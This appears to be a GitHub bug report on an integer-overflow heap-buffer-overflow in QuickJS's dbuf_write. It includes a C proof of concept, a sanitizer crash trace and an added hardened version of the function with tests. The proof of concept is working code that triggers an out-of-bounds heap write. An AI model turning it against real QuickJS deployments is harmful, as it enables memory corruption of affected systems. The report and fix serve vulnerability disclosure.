Heap-buffer-overflow on dbuf_write #443

@Microsvuln

Description

#include "cutils.h"
#include <stdint.h>
#include <stdio.h>

int main(void) {
    DynBuf db;
    dbuf_init(&db);
    uint8_t payload[16] = {0x41};
    size_t offset = (size_t)-8;     /* offset + len wraps around to 8 */
    size_t len    = 16;
    int r = dbuf_write(&db, offset, payload, len);
    printf("dbuf_write returned %d (size=%zu alloc=%zu)\n", r, db.size, db.allocated_size);
    dbuf_free(&db);
    return 0;
}

Compile:

clang -g -O1 -fsanitize=address,undefined -fno-omit-frame-pointer poc.c cutils.c -o poc

It's a heap out-of-bounds write due to an integer overflow.

No overflow check here:

int dbuf_write(DynBuf *s, size_t offset, const uint8_t *data, size_t len)
{
    size_t end;
    end = offset + len;      /* NO OVERFLOW CHECK: end wraps when offset is near SIZE_MAX */
    if (dbuf_realloc(s, end))
        return -1;
    memcpy(s->buf + offset, data, len);    /* CRASH POINT: s->buf + offset is outside the allocation */
    if (end > s->size)
        s->size = end;
    return 0;
}

ASAN:

ASAN_OPTIONS="symbolize=1:handle_segv=1:halt_on_error=1:detect_leaks=0:fast_unwind_on_fatal=0"   ./poc
cutils.c:131:19: runtime error: addition of unsigned offset to 0x602000000010 overflowed to 0x602000000008
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior cutils.c:131:19 in 
=================================================================
==4834==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000008 at pc 0x648863d7a52a bp 0x7fff51d78690 sp 0x7fff51d77e60
WRITE of size 16 at 0x602000000008 thread T0
    #0 0x648863d7a529 in __asan_memcpy (/home/arash/Documents/vr/quickjs/poc+0xa2529) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af)
    #1 0x648863db6d40 in dbuf_write /home/arash/Documents/vr/quickjs/cutils.c:131:5
    #2 0x648863db5f9d in main /home/arash/Documents/vr/quickjs/dbuf_oob.c:13:13
    #3 0x79f866229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0x79f866229e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #5 0x648863cf8304 in _start (/home/arash/Documents/vr/quickjs/poc+0x20304) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af)

0x602000000008 is located 8 bytes to the left of 8-byte region [0x602000000010,0x602000000018)
allocated by thread T0 here:
    #0 0x648863d7b576 in __interceptor_realloc (/home/arash/Documents/vr/quickjs/poc+0xa3576) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af)
    #1 0x648863db67ee in dbuf_default_realloc /home/arash/Documents/vr/quickjs/cutils.c:86:12
    #2 0x648863db6978 in dbuf_realloc /home/arash/Documents/vr/quickjs/cutils.c:114:19
    #3 0x648863db6c99 in dbuf_write /home/arash/Documents/vr/quickjs/cutils.c:129:9
    #4 0x648863db5f9d in main /home/arash/Documents/vr/quickjs/dbuf_oob.c:13:13
    #5 0x79f866229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/arash/Documents/vr/quickjs/poc+0xa2529) (BuildId: 40e4c7c4b5d4e0cfb93c55396917eb85e05ea1af) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa[fa]00 fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==4834==ABORTING
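As an added illustration (not QuickJS code and not part of the report above), the following stand-alone C program mirrors the shape of dbuf_write() with the guard the report says is missing: the end offset is checked for wraparound before dbuf_realloc() or memcpy() runs. The type ExDynBuf and the ex_* function names are hypothetical stand-ins for DynBuf and the cutils.c helpers; the growth policy in ex_dbuf_realloc() is an assumption, not the project's.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for QuickJS's DynBuf (added example, not cutils.c). */
typedef struct {
    uint8_t *buf;
    size_t size;            /* bytes written so far */
    size_t allocated_size;  /* capacity of buf */
} ExDynBuf;

static void ex_dbuf_init(ExDynBuf *s) { memset(s, 0, sizeof(*s)); }
static void ex_dbuf_free(ExDynBuf *s) { free(s->buf); memset(s, 0, sizeof(*s)); }

/* Grow the buffer to hold at least new_size bytes (assumed 1.5x growth policy). */
static int ex_dbuf_realloc(ExDynBuf *s, size_t new_size)
{
    size_t cap;
    uint8_t *p;
    if (new_size <= s->allocated_size)
        return 0;
    cap = s->allocated_size + s->allocated_size / 2;
    if (cap < new_size)
        cap = new_size;
    p = realloc(s->buf, cap);
    if (!p)
        return -1;
    s->buf = p;
    s->allocated_size = cap;
    return 0;
}

/* The missing guard: nonzero when offset + len would wrap past SIZE_MAX. */
static int ex_add_overflows(size_t offset, size_t len)
{
    return len > SIZE_MAX - offset;
}

/* Hardened write: same structure as dbuf_write(), but end is validated before
 * any allocation or memcpy, and a sparse write zero-fills the unwritten gap. */
static int ex_dbuf_write(ExDynBuf *s, size_t offset, const uint8_t *data, size_t len)
{
    size_t end;
    if (ex_add_overflows(offset, len))
        return -1;          /* e.g. (size_t)-8 + 16 would wrap to 8 */
    end = offset + len;
    if (ex_dbuf_realloc(s, end))
        return -1;
    if (offset > s->size)   /* bytes between the old size and offset were never written */
        memset(s->buf + s->size, 0, offset - s->size);
    memcpy(s->buf + offset, data, len);
    if (end > s->size)
        s->size = end;
    return 0;
}

/* The report's inputs (offset = (size_t)-8, len = 16): returns 1 when the write
 * is refused and the buffer is left untouched. */
static int ex_reject_wrapped_offset(void)
{
    ExDynBuf db;
    uint8_t payload[16];
    int r, ok;
    memset(payload, 0x41, sizeof payload);
    ex_dbuf_init(&db);
    r = ex_dbuf_write(&db, (size_t)-8, payload, sizeof payload);
    ok = (r == -1 && db.buf == NULL && db.size == 0 && db.allocated_size == 0);
    ex_dbuf_free(&db);
    return ok;
}

/* Normal use: a write at 0, then a sparse write at 32. Returns the final size (36)
 * when the data landed where expected and the gap reads as zero, else -1. */
static int ex_normal_writes(void)
{
    ExDynBuf db;
    uint8_t payload[16];
    int ok, result;
    memset(payload, 0x41, sizeof payload);
    ex_dbuf_init(&db);
    ok = ex_dbuf_write(&db, 0, payload, 16) == 0
      && ex_dbuf_write(&db, 32, payload, 4) == 0
      && db.buf[15] == 0x41 && db.buf[20] == 0
      && db.buf[32] == 0x41 && db.buf[35] == 0x41;
    result = ok ? (int)db.size : -1;
    ex_dbuf_free(&db);
    return result;
}

int main(void)
{
    printf("wrapped offset rejected: %d\n", ex_reject_wrapped_offset());
    printf("normal writes final size: %d\n", ex_normal_writes());
    return 0;
}
```

The check `len > SIZE_MAX - offset` cannot itself overflow, so it is safe to evaluate before computing `end`; placing it ahead of dbuf_realloc() also prevents the allocator from being asked for a wrapped, too-small size.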
